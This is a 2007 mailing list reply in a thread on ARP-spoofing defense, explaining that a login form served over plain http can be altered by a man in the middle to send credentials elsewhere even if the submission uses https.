ARP-spoofing defense

Michael L Torrie torriem at chem.byu.edu
Mon Mar 19 08:55:23 MDT 2007


On Mon, 2007-03-19 at 08:34 -0600, Brandon Stout wrote:
>    I avoid banks - go Credit Unions! Bank is, after all, a 4 letter
>    word...  Most banks and credit unions use http for the front page
> and
>    other public pages.  Encryption increases bandwidth usage, so for
>    large banks this makes sense.  When you submit your password, it
>    switches to https to encrypt your user name/password combo.  Use a
>    packet sniffer to make sure, but usually, even when the login page
> is
>    http, your password will get sent https. 


You missed the point. If the main page that contains the username and
password field is served using normal http, then a malicious man in the
middle can alter the form and send your username and password to a third
party, all without messing with ssl certificates.  Topher has written
code to do this on a LAN.

Michael








More information about the PLUG mailing list